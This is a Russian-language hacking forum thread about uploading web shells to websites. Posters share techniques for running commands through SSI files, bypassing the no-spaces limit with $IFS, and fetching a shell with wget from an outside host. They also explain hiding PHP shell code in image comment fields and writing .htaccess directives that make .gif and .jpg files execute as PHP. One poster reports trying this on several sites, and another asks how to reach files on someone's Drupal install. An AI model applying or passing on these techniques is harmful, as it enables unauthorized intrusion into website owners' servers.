вопрос только как создать/залить такой .htaccess

вопрос только как создать/залить такой .htaccess


в чем, конкретно, проблема? объясните всю ситуацию

↑ (https://antichat.live/posts/2935615/)
Также бывает, что если мы создадим файл file.shtm?cmd=... то в большинстве случаев скрипт не хотел выполнять системные команды, которые содержат пробел. т.е. "id" он выполнял, "ls" - тоже, а "uname -a" - нет, потому что содержит пробел. Таким образом все фишки типа "wget
http://shell.com/shell.php
" обламывались. Но не отчаиваетесь - выход есть:
Можно написать и скомпилировать програмку, которая выполняет системную команду скачивания шелла (через wget). скомпилировать, и залить её. Потом через SSI скрипт просто напросто выполнить её.


$IFS defaults to whitespace (http://tldp.org/LDP/abs/html/special-chars.html#WHITESPACEREF) (space, tab, and newline), but may be changed, for example, to parse a comma-separated data file. Note that $* (http://tldp.org/LDP/abs/html/internalvariables.html#APPREF) uses the first character held in $IFS.


ls$IFS-la

↑ (https://antichat.live/posts/2935615/)
к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так
http://site.com/foto.gif?cmd=phpinfo();
и радуемся!


Уже на нескольких сайтах перепробовал, везде при запросе


http://сайт/картинка.gif?cmd=phpinfo();

открывается просто картинка. В чем может быть причина?

Сделай .gif исполняемую как .php в .htaccess

А может подскажите как получить доступ к файлам если установлен Drupal 7.34, нет доступа к mysql, есть доступ к админке под юзером, где нет возможности не загрузить ни картинку ни модуль..

Хорошая статья - а чего ТС в бане?

только хотел плюсануть ...

Залит файл .htaccess, содержимое следующее:


AddType application/x-httpd-php .jpg .gif
AddHandler application/x-httpd-php .jpg .gif

AddType application/x-httpd-php .jpg .gif

SetHandler application/x-httpd-php


img.jpg (внутри обычный код шелла 96kb)

> Изображение "img.jpg" не может быть показано, так как содержит ошибки.

img2_exif.jpg?cmd=phpinfo(); [ Внутри комментарий ]

> Открывается обычная картинка, больше ничего не происходит.

img.gif?cmd=phpinfo(); [ Внутри комментарий ]

> Открывается обычная картинка 1px, больше ничего не происходит.

Тестирую на своём хостинге, если же просто залить img.php с содержимым:


+
+

+
+

И перейти по img.php?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ]

Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS)

Куда копать и почему не работает?

Браузеры разные пробовал, думал дело в них...

↑ (https://antichat.live/posts/4368134/)
Залит файл
.htaccess
, содержимое следующее:

AddType application/x-httpd-php .jpg .gif
AddHandler application/x-httpd-php .jpg .gif

AddType application/x-httpd-php .jpg .gif

SetHandler application/x-httpd-php


img.jpg
(внутри обычный код шелла 96kb)
> Изображение "img.jpg" не может быть показано, так как содержит ошибки.
img2_exif.jpg
?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка, больше ничего не происходит.
img.gif
?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка 1px, больше ничего не происходит.
Тестирую на своём хостинге, если же просто залить
img.php
с содержимым:

+
+

+
+

И перейти по
img.php
?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ]
Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS)
Куда копать и почему не работает?
Браузеры разные пробовал, думал дело в них...


Решили вопрос?

Если нет, то посмотреть вывод phpinfo() надо.